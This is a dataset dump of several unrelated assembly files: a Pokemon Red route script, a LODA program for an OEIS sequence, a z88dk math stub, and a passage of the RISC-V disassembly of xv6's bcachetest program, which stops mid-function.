EVENT_BEAT_ROUTE_25_TRAINER_6, 3, Route25BattleText7, Route25EndBattleText7, Route25AfterBattleText7 Route25TrainerHeader7: trainer EVENT_BEAT_ROUTE_25_TRAINER_7, 2, Route25BattleText8, Route25EndBattleText8, Route25AfterBattleText8 Route25TrainerHeader8: trainer EVENT_BEAT_ROUTE_25_TRAINER_8, 2, Route25BattleText9, Route25EndBattleText9, Route25AfterBattleText9 db -1 ; end Route25Text1: text_asm ld hl, Route25TrainerHeader0 call TalkToTrainer jp TextScriptEnd Route25Text2: text_asm ld hl, Route25TrainerHeader1 call TalkToTrainer jp TextScriptEnd Route25Text3: text_asm ld hl, Route25TrainerHeader2 call TalkToTrainer jp TextScriptEnd Route25Text4: text_asm ld hl, Route25TrainerHeader3 call TalkToTrainer jp TextScriptEnd Route25Text5: text_asm ld hl, Route25TrainerHeader4 call TalkToTrainer jp TextScriptEnd Route25Text6: text_asm ld hl, Route25TrainerHeader5 call TalkToTrainer jp TextScriptEnd Route25Text7: text_asm ld hl, Route25TrainerHeader6 call TalkToTrainer jp TextScriptEnd Route25Text8: text_asm ld hl, Route25TrainerHeader7 call TalkToTrainer jp TextScriptEnd Route25Text9: text_asm ld hl, Route25TrainerHeader8 call TalkToTrainer jp TextScriptEnd Route25BattleText1: text_far _Route25BattleText1 text_end Route25EndBattleText1: text_far _Route25EndBattleText1 text_end Route25AfterBattleText1: text_far _Route25AfterBattleText1 text_end Route25BattleText2: text_far _Route25BattleText2 text_end Route25EndBattleText2: text_far _Route25EndBattleText2 text_end Route25AfterBattleText2: text_far _Route25AfterBattleText2 text_end Route25BattleText3: text_far _Route25BattleText3 text_end Route25EndBattleText3: text_far _Route25EndBattleText3 text_end Route25AfterBattleText3: text_far _Route25AfterBattleText3 text_end Route25BattleText4: text_far _Route25BattleText4 text_end Route25EndBattleText4: text_far _Route25EndBattleText4 text_end Route25AfterBattleText4: text_far _Route25AfterBattleText4 text_end Route25BattleText5: text_far _Route25BattleText5 text_end Route25EndBattleText5: text_far _Route25EndBattleText5 text_end Route25AfterBattleText5: text_far _Route25AfterBattleText5 text_end Route25BattleText6: text_far _Route25BattleText6 text_end Route25EndBattleText6: text_far _Route25EndBattleText6 text_end Route25AfterBattleText6: text_far _Route25AfterBattleText6 text_end Route25BattleText7: text_far _Route25BattleText7 text_end Route25EndBattleText7: text_far _Route25EndBattleText7 text_end Route25AfterBattleText7: text_far _Route25AfterBattleText7 text_end Route25BattleText8: text_far _Route25BattleText8 text_end Route25EndBattleText8: text_far _Route25EndBattleText8 text_end Route25AfterBattleText8: text_far _Route25AfterBattleText8 text_end Route25BattleText9: text_far _Route25BattleText9 text_end Route25EndBattleText9: text_far _Route25EndBattleText9 text_end Route25AfterBattleText9: text_far _Route25AfterBattleText9 text_end Route25Text11: text_far _Route25Text11 text_end

21.26749

109

0.864938

a47981694cb978b027824d85d68bbf0002cfc8aa

2,231

asm

Assembly

programs/oeis/277/A277131.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

null

programs/oeis/277/A277131.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

null

programs/oeis/277/A277131.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

null

; A277131: Magic numbers of anti-Mackay icosahedra. ; 45,127,279,521,873,1355,1987,2789,3781,4983,6415,8097,10049,12291,14843,17725,20957,24559,28551,32953,37785,43067,48819,55061,61813,69095,76927,85329,94321,103923,114155,125037,136589,148831,161783,175465,189897,205099,221091,237893,255525,274007,293359,313601,334753,356835,379867,403869,428861,454863,481895,509977,539129,569371,600723,633205,666837,701639,737631,774833,813265,852947,893899,936141,979693,1024575,1070807,1118409,1167401,1217803,1269635,1322917,1377669,1433911,1491663,1550945,1611777,1674179,1738171,1803773,1871005,1939887,2010439,2082681,2156633,2232315,2309747,2388949,2469941,2552743,2637375,2723857,2812209,2902451,2994603,3088685,3184717,3282719,3382711,3484713,3588745,3694827,3802979,3913221,4025573,4140055,4256687,4375489,4496481,4619683,4745115,4872797,5002749,5134991,5269543,5406425,5545657,5687259,5831251,5977653,6126485,6277767,6431519,6587761,6746513,6907795,7071627,7238029,7407021,7578623,7752855,7929737,8109289,8291531,8476483,8664165,8854597,9047799,9243791,9442593,9644225,9848707,10056059,10266301,10479453,10695535,10914567,11136569,11361561,11589563,11820595,12054677,12291829,12532071,12775423,13021905,13271537,13524339,13780331,14039533,14301965,14567647,14836599,15108841,15384393,15663275,15945507,16231109,16520101,16812503,17108335,17407617,17710369,18016611,18326363,18639645,18956477,19276879,19600871,19928473,20259705,20594587,20933139,21275381,21621333,21971015,22324447,22681649,23042641,23407443,23776075,24148557,24524909,24905151,25289303,25677385,26069417,26465419,26865411,27269413,27677445,28089527,28505679,28925921,29350273,29778755,30211387,30648189,31089181,31534383,31983815,32437497,32895449,33357691,33824243,34295125,34770357,35249959,35733951,36222353,36715185,37212467,37714219,38220461,38731213,39246495,39766327,40290729,40819721,41353323,41891555,42434437,42981989,43534231,44091183,44652865,45219297,45790499,46366491,46947293,47532925,48123407,48718759,49319001,49924153,50534235,51149267,51769269,52394261,53024263 mov $3,$0 add $0,1 mov $2,5 mov $4,6 lpb $0,1 sub $0,1 add $2,10 add $4,$2 add $1,$4 lpe add $1,4 sub $1,$2 sub $1,6 mul $1,2 lpb $3,1 add $1,10 sub $3,1 lpe add $1,37

97

1,997

0.84312

da81aaa7ff85672821321a8266359a3d336098ca

108

asm

Assembly

libsrc/_DEVELOPMENT/math/float/math48/lm/c/sdcc_ix/fma.asm

jpoikela/z88dk

7108b2d7e3a98a77de99b30c9a7c9199da9c75cb

[ "ClArtistic" ]

640

2017-01-14T23:33:45.000Z

2022-03-30T11:28:42.000Z

libsrc/_DEVELOPMENT/math/float/math48/lm/c/sdcc_ix/fma.asm

jpoikela/z88dk

7108b2d7e3a98a77de99b30c9a7c9199da9c75cb

[ "ClArtistic" ]

1,600

2017-01-15T16:12:02.000Z

2022-03-31T12:11:12.000Z

libsrc/_DEVELOPMENT/math/float/math48/lm/c/sdcc_ix/fma.asm

jpoikela/z88dk

7108b2d7e3a98a77de99b30c9a7c9199da9c75cb

[ "ClArtistic" ]

215

2017-01-17T10:43:03.000Z

2022-03-23T17:25:02.000Z

SECTION code_clib SECTION code_fp_math48 PUBLIC _fma EXTERN cm48_sdccix_fma defc _fma = cm48_sdccix_fma

10.8

27

0.842593

3fd0e3ccab74acf92676fe087107d24598691d8f

57,035

asm

Assembly

user/bcachetest.asm

Grapefruitcc/xv6-riscv-fall19

6a3bb66142d1d946f8089b9cd4ebbd347c7c089a

[ "MIT-0" ]

1

2021-05-26T06:35:54.000Z

user/bcachetest.asm

Grapefruitcc/xv6-riscv-fall19

6a3bb66142d1d946f8089b9cd4ebbd347c7c089a

[ "MIT-0" ]

null

user/bcachetest.asm

Grapefruitcc/xv6-riscv-fall19

6a3bb66142d1d946f8089b9cd4ebbd347c7c089a

[ "MIT-0" ]

null

user/_bcachetest: file format elf64-littleriscv Disassembly of section .text: 0000000000000000 <createfile>: exit(0); } void createfile(char *file, int nblock) { 0: bd010113 addi sp,sp,-1072 4: 42113423 sd ra,1064(sp) 8: 42813023 sd s0,1056(sp) c: 40913c23 sd s1,1048(sp) 10: 41213823 sd s2,1040(sp) 14: 41313423 sd s3,1032(sp) 18: 41413023 sd s4,1024(sp) 1c: 43010413 addi s0,sp,1072 20: 8a2a mv s4,a0 22: 89ae mv s3,a1 int fd; char buf[BSIZE]; int i; fd = open(file, O_CREATE | O_RDWR); 24: 20200593 li a1,514 28: 00000097 auipc ra,0x0 2c: 75a080e7 jalr 1882(ra) # 782 <open> if(fd < 0){ 30: 04054a63 bltz a0,84 <createfile+0x84> 34: 892a mv s2,a0 printf("test0 create %s failed\n", file); exit(-1); } for(i = 0; i < nblock; i++) { 36: 4481 li s1,0 38: 03305263 blez s3,5c <createfile+0x5c> if(write(fd, buf, sizeof(buf)) != sizeof(buf)) { 3c: 40000613 li a2,1024 40: bd040593 addi a1,s0,-1072 44: 854a mv a0,s2 46: 00000097 auipc ra,0x0 4a: 71c080e7 jalr 1820(ra) # 762 <write> 4e: 40000793 li a5,1024 52: 04f51763 bne a0,a5,a0 <createfile+0xa0> for(i = 0; i < nblock; i++) { 56: 2485 addiw s1,s1,1 58: fe9992e3 bne s3,s1,3c <createfile+0x3c> printf("write %s failed\n", file); exit(-1); } } close(fd); 5c: 854a mv a0,s2 5e: 00000097 auipc ra,0x0 62: 70c080e7 jalr 1804(ra) # 76a <close> } 66: 42813083 ld ra,1064(sp) 6a: 42013403 ld s0,1056(sp) 6e: 41813483 ld s1,1048(sp) 72: 41013903 ld s2,1040(sp) 76: 40813983 ld s3,1032(sp) 7a: 40013a03 ld s4,1024(sp) 7e: 43010113 addi sp,sp,1072 82: 8082 ret printf("test0 create %s failed\n", file); 84: 85d2 mv a1,s4 86: 00001517 auipc a0,0x1 8a: be250513 addi a0,a0,-1054 # c68 <malloc+0xe8> 8e: 00001097 auipc ra,0x1 92: a34080e7 jalr -1484(ra) # ac2 <printf> exit(-1); 96: 557d li a0,-1 98: 00000097 auipc ra,0x0 9c: 6aa080e7 jalr 1706(ra) # 742 <exit> printf("write %s failed\n", file); a0: 85d2 mv a1,s4 a2: 00001517 auipc a0,0x1 a6: bde50513 addi a0,a0,-1058 # c80 <malloc+0x100> aa: 00001097 auipc ra,0x1 ae: a18080e7 jalr -1512(ra) # ac2 <printf> exit(-1); b2: 557d li a0,-1 b4: 00000097 auipc ra,0x0 b8: 68e080e7 jalr 1678(ra) # 742 <exit> 00000000000000bc <readfile>: void readfile(char *file, int nbytes, int inc) { bc: bc010113 addi sp,sp,-1088 c0: 42113c23 sd ra,1080(sp) c4: 42813823 sd s0,1072(sp) c8: 42913423 sd s1,1064(sp) cc: 43213023 sd s2,1056(sp) d0: 41313c23 sd s3,1048(sp) d4: 41413823 sd s4,1040(sp) d8: 41513423 sd s5,1032(sp) dc: 44010413 addi s0,sp,1088 char buf[BSIZE]; int fd; int i; if(inc > BSIZE) { e0: 40000793 li a5,1024 e4: 06c7c463 blt a5,a2,14c <readfile+0x90> e8: 8aaa mv s5,a0 ea: 8a2e mv s4,a1 ec: 84b2 mv s1,a2 printf("test0: inc too large\n"); exit(-1); } if ((fd = open(file, O_RDONLY)) < 0) { ee: 4581 li a1,0 f0: 00000097 auipc ra,0x0 f4: 692080e7 jalr 1682(ra) # 782 <open> f8: 89aa mv s3,a0 fa: 06054663 bltz a0,166 <readfile+0xaa> printf("test0 open %s failed\n", file); exit(-1); } for (i = 0; i < nbytes; i += inc) { fe: 4901 li s2,0 100: 03405063 blez s4,120 <readfile+0x64> if(read(fd, buf, inc) != inc) { 104: 8626 mv a2,s1 106: bc040593 addi a1,s0,-1088 10a: 854e mv a0,s3 10c: 00000097 auipc ra,0x0 110: 64e080e7 jalr 1614(ra) # 75a <read> 114: 06951763 bne a0,s1,182 <readfile+0xc6> for (i = 0; i < nbytes; i += inc) { 118: 0124893b addw s2,s1,s2 11c: ff4944e3 blt s2,s4,104 <readfile+0x48> printf("read %s failed for block %d (%d)\n", file, i, nbytes); exit(-1); } } close(fd); 120: 854e mv a0,s3 122: 00000097 auipc ra,0x0 126: 648080e7 jalr 1608(ra) # 76a <close> } 12a: 43813083 ld ra,1080(sp) 12e: 43013403 ld s0,1072(sp) 132: 42813483 ld s1,1064(sp) 136: 42013903 ld s2,1056(sp) 13a: 41813983 ld s3,1048(sp) 13e: 41013a03 ld s4,1040(sp) 142: 40813a83 ld s5,1032(sp) 146: 44010113 addi sp,sp,1088 14a: 8082 ret printf("test0: inc too large\n"); 14c: 00001517 auipc a0,0x1 150: b4c50513 addi a0,a0,-1204 # c98 <malloc+0x118> 154: 00001097 auipc ra,0x1 158: 96e080e7 jalr -1682(ra) # ac2 <printf> exit(-1); 15c: 557d li a0,-1 15e: 00000097 auipc ra,0x0 162: 5e4080e7 jalr 1508(ra) # 742 <exit> printf("test0 open %s failed\n", file); 166: 85d6 mv a1,s5 168: 00001517 auipc a0,0x1 16c: b4850513 addi a0,a0,-1208 # cb0 <malloc+0x130> 170: 00001097 auipc ra,0x1 174: 952080e7 jalr -1710(ra) # ac2 <printf> exit(-1); 178: 557d li a0,-1 17a: 00000097 auipc ra,0x0 17e: 5c8080e7 jalr 1480(ra) # 742 <exit> printf("read %s failed for block %d (%d)\n", file, i, nbytes); 182: 86d2 mv a3,s4 184: 864a mv a2,s2 186: 85d6 mv a1,s5 188: 00001517 auipc a0,0x1 18c: b4050513 addi a0,a0,-1216 # cc8 <malloc+0x148> 190: 00001097 auipc ra,0x1 194: 932080e7 jalr -1742(ra) # ac2 <printf> exit(-1); 198: 557d li a0,-1 19a: 00000097 auipc ra,0x0 19e: 5a8080e7 jalr 1448(ra) # 742 <exit> 00000000000001a2 <test0>: void test0() { 1a2: 7139 addi sp,sp,-64 1a4: fc06 sd ra,56(sp) 1a6: f822 sd s0,48(sp) 1a8: f426 sd s1,40(sp) 1aa: f04a sd s2,32(sp) 1ac: ec4e sd s3,24(sp) 1ae: 0080 addi s0,sp,64 char file[2]; char dir[2]; enum { N = 10, NCHILD = 3 }; int n; dir[0] = '0'; 1b0: 03000793 li a5,48 1b4: fcf40023 sb a5,-64(s0) dir[1] = '\0'; 1b8: fc0400a3 sb zero,-63(s0) file[0] = 'F'; 1bc: 04600793 li a5,70 1c0: fcf40423 sb a5,-56(s0) file[1] = '\0'; 1c4: fc0404a3 sb zero,-55(s0) printf("start test0\n"); 1c8: 00001517 auipc a0,0x1 1cc: b2850513 addi a0,a0,-1240 # cf0 <malloc+0x170> 1d0: 00001097 auipc ra,0x1 1d4: 8f2080e7 jalr -1806(ra) # ac2 <printf> 1d8: 03000493 li s1,48 printf("chdir failed\n"); exit(1); } unlink(file); createfile(file, N); if (chdir("..") < 0) { 1dc: 00001997 auipc s3,0x1 1e0: b3498993 addi s3,s3,-1228 # d10 <malloc+0x190> for(int i = 0; i < NCHILD; i++){ 1e4: 03300913 li s2,51 dir[0] = '0' + i; 1e8: fc940023 sb s1,-64(s0) mkdir(dir); 1ec: fc040513 addi a0,s0,-64 1f0: 00000097 auipc ra,0x0 1f4: 5ba080e7 jalr 1466(ra) # 7aa <mkdir> if (chdir(dir) < 0) { 1f8: fc040513 addi a0,s0,-64 1fc: 00000097 auipc ra,0x0 200: 5b6080e7 jalr 1462(ra) # 7b2 <chdir> 204: 0c054163 bltz a0,2c6 <test0+0x124> unlink(file); 208: fc840513 addi a0,s0,-56 20c: 00000097 auipc ra,0x0 210: 586080e7 jalr 1414(ra) # 792 <unlink> createfile(file, N); 214: 45a9 li a1,10 216: fc840513 addi a0,s0,-56 21a: 00000097 auipc ra,0x0 21e: de6080e7 jalr -538(ra) # 0 <createfile> if (chdir("..") < 0) { 222: 854e mv a0,s3 224: 00000097 auipc ra,0x0 228: 58e080e7 jalr 1422(ra) # 7b2 <chdir> 22c: 0a054a63 bltz a0,2e0 <test0+0x13e> for(int i = 0; i < NCHILD; i++){ 230: 2485 addiw s1,s1,1 232: 0ff4f493 andi s1,s1,255 236: fb2499e3 bne s1,s2,1e8 <test0+0x46> printf("chdir failed\n"); exit(1); } } ntas(0); 23a: 4501 li a0,0 23c: 00000097 auipc ra,0x0 240: 5a6080e7 jalr 1446(ra) # 7e2 <ntas> 244: 03000493 li s1,48 for(int i = 0; i < NCHILD; i++){ 248: 03300913 li s2,51 dir[0] = '0' + i; 24c: fc940023 sb s1,-64(s0) int pid = fork(); 250: 00000097 auipc ra,0x0 254: 4ea080e7 jalr 1258(ra) # 73a <fork> if(pid < 0){ 258: 0a054163 bltz a0,2fa <test0+0x158> printf("fork failed"); exit(-1); } if(pid == 0){ 25c: cd45 beqz a0,314 <test0+0x172> for(int i = 0; i < NCHILD; i++){ 25e: 2485 addiw s1,s1,1 260: 0ff4f493 andi s1,s1,255 264: ff2494e3 bne s1,s2,24c <test0+0xaa> exit(0); } } for(int i = 0; i < NCHILD; i++){ wait(0); 268: 4501 li a0,0 26a: 00000097 auipc ra,0x0 26e: 4e0080e7 jalr 1248(ra) # 74a <wait> 272: 4501 li a0,0 274: 00000097 auipc ra,0x0 278: 4d6080e7 jalr 1238(ra) # 74a <wait> 27c: 4501 li a0,0 27e: 00000097 auipc ra,0x0 282: 4cc080e7 jalr 1228(ra) # 74a <wait> } printf("test0 results:\n"); 286: 00001517 auipc a0,0x1 28a: aa250513 addi a0,a0,-1374 # d28 <malloc+0x1a8> 28e: 00001097 auipc ra,0x1 292: 834080e7 jalr -1996(ra) # ac2 <printf> n = ntas(1); 296: 4505 li a0,1 298: 00000097 auipc ra,0x0 29c: 54a080e7 jalr 1354(ra) # 7e2 <ntas> if (n < 500) 2a0: 1f300793 li a5,499 2a4: 0aa7cc63 blt a5,a0,35c <test0+0x1ba> printf("test0: OK\n"); 2a8: 00001517 auipc a0,0x1 2ac: a9050513 addi a0,a0,-1392 # d38 <malloc+0x1b8> 2b0: 00001097 auipc ra,0x1 2b4: 812080e7 jalr -2030(ra) # ac2 <printf> else printf("test0: FAIL\n"); } 2b8: 70e2 ld ra,56(sp) 2ba: 7442 ld s0,48(sp) 2bc: 74a2 ld s1,40(sp) 2be: 7902 ld s2,32(sp) 2c0: 69e2 ld s3,24(sp) 2c2: 6121 addi sp,sp,64 2c4: 8082 ret printf("chdir failed\n"); 2c6: 00001517 auipc a0,0x1 2ca: a3a50513 addi a0,a0,-1478 # d00 <malloc+0x180> 2ce: 00000097 auipc ra,0x0 2d2: 7f4080e7 jalr 2036(ra) # ac2 <printf> exit(1); 2d6: 4505 li a0,1 2d8: 00000097 auipc ra,0x0 2dc: 46a080e7 jalr 1130(ra) # 742 <exit> printf("chdir failed\n"); 2e0: 00001517 auipc a0,0x1 2e4: a2050513 addi a0,a0,-1504 # d00 <malloc+0x180> 2e8: 00000097 auipc ra,0x0 2ec: 7da080e7 jalr 2010(ra) # ac2 <printf> exit(1); 2f0: 4505 li a0,1 2f2: 00000097 auipc ra,0x0 2f6: 450080e7 jalr 1104(ra) # 742 <exit> printf("fork failed"); 2fa: 00001517 auipc a0,0x1 2fe: a1e50513 addi a0,a0,-1506 # d18 <malloc+0x198> 302: 00000097 auipc ra,0x0 306: 7c0080e7 jalr 1984(ra) # ac2 <printf> exit(-1); 30a: 557d li a0,-1 30c: 00000097 auipc ra,0x0 310: 436080e7 jalr 1078(ra) # 742 <exit> if (chdir(dir) < 0) { 314: fc040513 addi a0,s0,-64 318: 00000097 auipc ra,0x0 31c: 49a080e7 jalr 1178(ra) # 7b2 <chdir> 320: 02054163 bltz a0,342 <test0+0x1a0> readfile(file, N*BSIZE, 1); 324: 4605 li a2,1 326: 658d lui a1,0x3 328: 80058593 addi a1,a1,-2048 # 2800 <__global_pointer$+0x126f> 32c: fc840513 addi a0,s0,-56 330: 00000097 auipc ra,0x0 334: d8c080e7 jalr -628(ra) # bc <readfile> exit(0); 338: 4501 li a0,0 33a: 00000097 auipc ra,0x0 33e: 408080e7 jalr 1032(ra) # 742 <exit> printf("chdir failed\n"); 342: 00001517 auipc a0,0x1 346: 9be50513 addi a0,a0,-1602 # d00 <malloc+0x180> 34a: 00000097 auipc ra,0x0 34e: 778080e7 jalr 1912(ra) # ac2 <printf> exit(1); 352: 4505 li a0,1 354: 00000097 auipc ra,0x0 358: 3ee080e7 jalr 1006(ra) # 742 <exit> printf("test0: FAIL\n"); 35c: 00001517 auipc a0,0x1 360: 9ec50513 addi a0,a0,-1556 # d48 <malloc+0x1c8> 364: 00000097 auipc ra,0x0 368: 75e080e7 jalr 1886(ra) # ac2 <printf> } 36c: b7b1 j 2b8 <test0+0x116> 000000000000036e <test1>: void test1() { 36e: 7179 addi sp,sp,-48 370: f406 sd ra,40(sp) 372: f022 sd s0,32(sp) 374: ec26 sd s1,24(sp) 376: e84a sd s2,16(sp) 378: 1800 addi s0,sp,48 char file[3]; enum { N = 100, BIG=100, NCHILD=2 }; printf("start test1\n"); 37a: 00001517 auipc a0,0x1 37e: 9de50513 addi a0,a0,-1570 # d58 <malloc+0x1d8> 382: 00000097 auipc ra,0x0 386: 740080e7 jalr 1856(ra) # ac2 <printf> file[0] = 'B'; 38a: 04200793 li a5,66 38e: fcf40c23 sb a5,-40(s0) file[2] = '\0'; 392: fc040d23 sb zero,-38(s0) 396: 4485 li s1,1 for(int i = 0; i < NCHILD; i++){ file[1] = '0' + i; unlink(file); if (i == 0) { 398: 4905 li s2,1 39a: a811 j 3ae <test1+0x40> createfile(file, BIG); 39c: 06400593 li a1,100 3a0: fd840513 addi a0,s0,-40 3a4: 00000097 auipc ra,0x0 3a8: c5c080e7 jalr -932(ra) # 0 <createfile> for(int i = 0; i < NCHILD; i++){ 3ac: 2485 addiw s1,s1,1 file[1] = '0' + i; 3ae: 02f4879b addiw a5,s1,47 3b2: fcf40ca3 sb a5,-39(s0) unlink(file); 3b6: fd840513 addi a0,s0,-40 3ba: 00000097 auipc ra,0x0 3be: 3d8080e7 jalr 984(ra) # 792 <unlink> if (i == 0) { 3c2: fd248de3 beq s1,s2,39c <test1+0x2e> } else { createfile(file, 1); 3c6: 85ca mv a1,s2 3c8: fd840513 addi a0,s0,-40 3cc: 00000097 auipc ra,0x0 3d0: c34080e7 jalr -972(ra) # 0 <createfile> for(int i = 0; i < NCHILD; i++){ 3d4: 0004879b sext.w a5,s1 3d8: fcf95ae3 bge s2,a5,3ac <test1+0x3e> } } for(int i = 0; i < NCHILD; i++){ file[1] = '0' + i; 3dc: 03000793 li a5,48 3e0: fcf40ca3 sb a5,-39(s0) int pid = fork(); 3e4: 00000097 auipc ra,0x0 3e8: 356080e7 jalr 854(ra) # 73a <fork> if(pid < 0){ 3ec: 04054663 bltz a0,438 <test1+0xca> printf("fork failed"); exit(-1); } if(pid == 0){ 3f0: c12d beqz a0,452 <test1+0xe4> file[1] = '0' + i; 3f2: 03100793 li a5,49 3f6: fcf40ca3 sb a5,-39(s0) int pid = fork(); 3fa: 00000097 auipc ra,0x0 3fe: 340080e7 jalr 832(ra) # 73a <fork> if(pid < 0){ 402: 02054b63 bltz a0,438 <test1+0xca> if(pid == 0){ 406: cd35 beqz a0,482 <test1+0x114> exit(0); } } for(int i = 0; i < NCHILD; i++){ wait(0); 408: 4501 li a0,0 40a: 00000097 auipc ra,0x0 40e: 340080e7 jalr 832(ra) # 74a <wait> 412: 4501 li a0,0 414: 00000097 auipc ra,0x0 418: 336080e7 jalr 822(ra) # 74a <wait> } printf("test1 OK\n"); 41c: 00001517 auipc a0,0x1 420: 94c50513 addi a0,a0,-1716 # d68 <malloc+0x1e8> 424: 00000097 auipc ra,0x0 428: 69e080e7 jalr 1694(ra) # ac2 <printf> } 42c: 70a2 ld ra,40(sp) 42e: 7402 ld s0,32(sp) 430: 64e2 ld s1,24(sp) 432: 6942 ld s2,16(sp) 434: 6145 addi sp,sp,48 436: 8082 ret printf("fork failed"); 438: 00001517 auipc a0,0x1 43c: 8e050513 addi a0,a0,-1824 # d18 <malloc+0x198> 440: 00000097 auipc ra,0x0 444: 682080e7 jalr 1666(ra) # ac2 <printf> exit(-1); 448: 557d li a0,-1 44a: 00000097 auipc ra,0x0 44e: 2f8080e7 jalr 760(ra) # 742 <exit> if(pid == 0){ 452: 06400493 li s1,100 readfile(file, BIG*BSIZE, BSIZE); 456: 40000613 li a2,1024 45a: 65e5 lui a1,0x19 45c: fd840513 addi a0,s0,-40 460: 00000097 auipc ra,0x0 464: c5c080e7 jalr -932(ra) # bc <readfile> for (i = 0; i < N; i++) { 468: 34fd addiw s1,s1,-1 46a: f4f5 bnez s1,456 <test1+0xe8> unlink(file); 46c: fd840513 addi a0,s0,-40 470: 00000097 auipc ra,0x0 474: 322080e7 jalr 802(ra) # 792 <unlink> exit(0); 478: 4501 li a0,0 47a: 00000097 auipc ra,0x0 47e: 2c8080e7 jalr 712(ra) # 742 <exit> 482: 06400493 li s1,100 readfile(file, 1, BSIZE); 486: 40000613 li a2,1024 48a: 4585 li a1,1 48c: fd840513 addi a0,s0,-40 490: 00000097 auipc ra,0x0 494: c2c080e7 jalr -980(ra) # bc <readfile> for (i = 0; i < N; i++) { 498: 34fd addiw s1,s1,-1 49a: f4f5 bnez s1,486 <test1+0x118> unlink(file); 49c: fd840513 addi a0,s0,-40 4a0: 00000097 auipc ra,0x0 4a4: 2f2080e7 jalr 754(ra) # 792 <unlink> exit(0); 4a8: 4501 li a0,0 4aa: 00000097 auipc ra,0x0 4ae: 298080e7 jalr 664(ra) # 742 <exit> 00000000000004b2 <main>: { 4b2: 1141 addi sp,sp,-16 4b4: e406 sd ra,8(sp) 4b6: e022 sd s0,0(sp) 4b8: 0800 addi s0,sp,16 test0(); 4ba: 00000097 auipc ra,0x0 4be: ce8080e7 jalr -792(ra) # 1a2 <test0> test1(); 4c2: 00000097 auipc ra,0x0 4c6: eac080e7 jalr -340(ra) # 36e <test1> exit(0); 4ca: 4501 li a0,0 4cc: 00000097 auipc ra,0x0 4d0: 276080e7 jalr 630(ra) # 742 <exit> 00000000000004d4 <strcpy>: #include "kernel/fcntl.h" #include "user/user.h" char* strcpy(char *s, const char *t) { 4d4: 1141 addi sp,sp,-16 4d6: e422 sd s0,8(sp) 4d8: 0800 addi s0,sp,16 char *os; os = s; while((*s++ = *t++) != 0) 4da: 87aa mv a5,a0 4dc: 0585 addi a1,a1,1 4de: 0785 addi a5,a5,1 4e0: fff5c703 lbu a4,-1(a1) # 18fff <__global_pointer$+0x17a6e> 4e4: fee78fa3 sb a4,-1(a5) 4e8: fb75 bnez a4,4dc <strcpy+0x8> ; return os; } 4ea: 6422 ld s0,8(sp) 4ec: 0141 addi sp,sp,16 4ee: 8082 ret 00000000000004f0 <strcmp>: int strcmp(const char *p, const char *q) { 4f0: 1141 addi sp,sp,-16 4f2: e422 sd s0,8(sp) 4f4: 0800 addi s0,sp,16 while(*p && *p == *q) 4f6: 00054783 lbu a5,0(a0) 4fa: cb91 beqz a5,50e <strcmp+0x1e> 4fc: 0005c703 lbu a4,0(a1) 500: 00f71763 bne a4,a5,50e <strcmp+0x1e> p++, q++; 504: 0505 addi a0,a0,1 506: 0585 addi a1,a1,1 while(*p && *p == *q) 508: 00054783 lbu a5,0(a0) 50c: fbe5 bnez a5,4fc <strcmp+0xc> return (uchar)*p - (uchar)*q; 50e: 0005c503 lbu a0,0(a1) } 512: 40a7853b subw a0,a5,a0 516: 6422 ld s0,8(sp) 518: 0141 addi sp,sp,16 51a: 8082 ret 000000000000051c <strlen>: uint strlen(const char *s) { 51c: 1141 addi sp,sp,-16 51e: e422 sd s0,8(sp) 520: 0800 addi s0,sp,16 int n; for(n = 0; s[n]; n++) 522: 00054783 lbu a5,0(a0) 526: cf91 beqz a5,542 <strlen+0x26> 528: 0505 addi a0,a0,1 52a: 87aa mv a5,a0 52c: 4685 li a3,1 52e: 9e89 subw a3,a3,a0 530: 00f6853b addw a0,a3,a5 534: 0785 addi a5,a5,1 536: fff7c703 lbu a4,-1(a5) 53a: fb7d bnez a4,530 <strlen+0x14> ; return n; } 53c: 6422 ld s0,8(sp) 53e: 0141 addi sp,sp,16 540: 8082 ret for(n = 0; s[n]; n++) 542: 4501 li a0,0 544: bfe5 j 53c <strlen+0x20> 0000000000000546 <memset>: void* memset(void *dst, int c, uint n) { 546: 1141 addi sp,sp,-16 548: e422 sd s0,8(sp) 54a: 0800 addi s0,sp,16 char *cdst = (char *) dst; int i; for(i = 0; i < n; i++){ 54c: ca19 beqz a2,562 <memset+0x1c> 54e: 87aa mv a5,a0 550: 1602 slli a2,a2,0x20 552: 9201 srli a2,a2,0x20 554: 00a60733 add a4,a2,a0 cdst[i] = c; 558: 00b78023 sb a1,0(a5) for(i = 0; i < n; i++){ 55c: 0785 addi a5,a5,1 55e: fee79de3 bne a5,a4,558 <memset+0x12> } return dst; } 562: 6422 ld s0,8(sp) 564: 0141 addi sp,sp,16 566: 8082 ret 0000000000000568 <strchr>: char* strchr(const char *s, char c) { 568: 1141 addi sp,sp,-16 56a: e422 sd s0,8(sp) 56c: 0800 addi s0,sp,16 for(; *s; s++) 56e: 00054783 lbu a5,0(a0) 572: cb99 beqz a5,588 <strchr+0x20> if(*s == c) 574: 00f58763 beq a1,a5,582 <strchr+0x1a> for(; *s; s++) 578: 0505 addi a0,a0,1 57a: 00054783 lbu a5,0(a0) 57e: fbfd bnez a5,574 <strchr+0xc> return (char*)s; return 0; 580: 4501 li a0,0 } 582: 6422 ld s0,8(sp) 584: 0141 addi sp,sp,16 586: 8082 ret return 0; 588: 4501 li a0,0 58a: bfe5 j 582 <strchr+0x1a> 000000000000058c <gets>: char* gets(char *buf, int max) { 58c: 711d addi sp,sp,-96 58e: ec86 sd ra,88(sp) 590: e8a2 sd s0,80(sp) 592: e4a6 sd s1,72(sp) 594: e0ca sd s2,64(sp) 596: fc4e sd s3,56(sp) 598: f852 sd s4,48(sp) 59a: f456 sd s5,40(sp) 59c: f05a sd s6,32(sp) 59e: ec5e sd s7,24(sp) 5a0: 1080 addi s0,sp,96 5a2: 8baa mv s7,a0 5a4: 8a2e mv s4,a1 int i, cc; char c; for(i=0; i+1 < max; ){ 5a6: 892a mv s2,a0 5a8: 4481 li s1,0 cc = read(0, &c, 1); if(cc < 1) break; buf[i++] = c; if(c == '\n' || c == '\r') 5aa: 4aa9 li s5,10 5ac: 4b35 li s6,13 for(i=0; i+1 < max; ){ 5ae: 89a6 mv s3,s1 5b0: 2485 addiw s1,s1,1 5b2: 0344d863 bge s1,s4,5e2 <gets+0x56> cc = read(0, &c, 1); 5b6: 4605 li a2,1 5b8: faf40593 addi a1,s0,-81 5bc: 4501 li a0,0 